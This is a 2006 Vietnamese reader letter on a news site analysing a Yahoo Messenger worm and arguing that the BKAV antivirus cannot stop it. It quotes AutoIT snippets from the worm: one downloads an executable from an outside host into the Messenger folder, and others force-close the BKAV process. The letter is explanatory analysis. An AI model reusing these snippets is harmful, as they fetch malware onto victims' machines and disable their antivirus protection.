Thứ hai, 18/8/2025
Mới nhất
Tin theo khu vực
International
Thứ năm, 5/10/2006, 22:46 (GMT+7)

Không thể dùng BKAV diệt virus Yahoo Messenger

Việc sử dụng BKAV phiên bản mới nhất để diệt script lây qua Y!M này thì chắc chắn không được. Bởi vì, BKAV là một chương trình không có chức năng đặt mật khẩu cho phần mềm, nên việc kẻ tấn công sử dụng script End Task BKAV một cách quá dễ dàng... (Nguyên Hoàng)

Người gửi: Nguyên Hoàng
Gửi tới: Ban Vi tính
Tiêu đề: BKAV có lẽ không làm gì đc.

"Những virus này lợi dụng các đặc tính của phần mềm chat trực tuyến Yahoo Messenger, tự động cài virus vào máy thông qua các link gửi từ list YM của máy nạn nhân để phát tán, nên có tốc độ lây nhiễm cực mạnh....". Nhưng thực ra, virus này không tự cài vào máy. Đoạn java script được attacker chèn vào web, lợi dụng bug của IE mà java script này download file xuống máy của nạn nhân tại C:\Program Files\Yahoo!\Messenger với tên là yupdate.exe đối với phiên bản 8.0, còn đối với phiên bản cũ với tên là update.exe. Kẻ tấn công sử dụng hàm Inetget của autoIT để thực thi việc download file xuống máy.

Code: InetGet("http://www.thuduc.info/note.exe", "C:\Program Files\Yahoo!\Messenger\yupdater.exe"); Advanced example - downloading in the background InetGet "http://www.thuduc.info/note.exe", "note.exe", 1, 1)

While @InetGetActive
TrayTip("Downloading", "Bytes = " & @InetGetBytesRead, 10, 16)
Sleep(250) Wend MsgBox(0, "Bytes read", @InetGetBytesRead)
code có thể download chồng vào file update, yupdate thì kẻ tấn công đã sử dụng hàm

Code: If Proces***ists("yupdate.exe") Then ProcessClose("yupdate.exe") EndIf.

"Sử dụng ít nhất một phần mềm diệt virus, quét định kỳ, và thường xuyên cập nhật các thông tin mới. Thường xuyên download chương trình sửa lỗi của các nhà cung cấp phần mềm, đặc biệt từ các nhà cung cấp hệ điều hành như Microsoft..." Thực ra đoạn script được viết bằng AutoIT này các chương trình diệt virus hầu như không nhận biết được. Việc sử dụng BKAV phiên bản mới nhất để diệt script lây qua Y!M này thì chắc chắn không được. Bởi vì, BKAV là một chương trình không có chức năng đặt mật khẩu cho phần mềm, nên việc kẻ tấn công sử dụng script End Task BKAV một cách quá dễ dàng bằng Code: If Proces***ists("Bkav2006.exe") Then ProcessClose("Bkav2006.exe") EndIf.

Và tất nhiên, các chương trình antivirus nào không có chức năng đặt mật khẩu để thay đổi setting cho soft thì script này end task dễ dàng. Và sau đó tiếp tục auto thực thi lệnh.

BKAV có một yếu điểm trầm trọng là không thể quét nội dung trong file exe. Nên việc ngăn chặn script lây qua YM này là không thể. Script lây qua Y!M không phải là một chương trình phá hoại hệ thống, mà kẻ tấn công chỉ viết để spam link quảng cáo. Hơn nữa, nếu thay vì dùng kiểu này để quảng cáo mà là 1 keyloger thì hậu quả của nó nghiêm trọng nhường nào?

Nguyên Hoàng sưu tầm (pwreturncenter@yahoo.com).

 

  Trở lại Ý kiếnTrở lại Ý kiến
×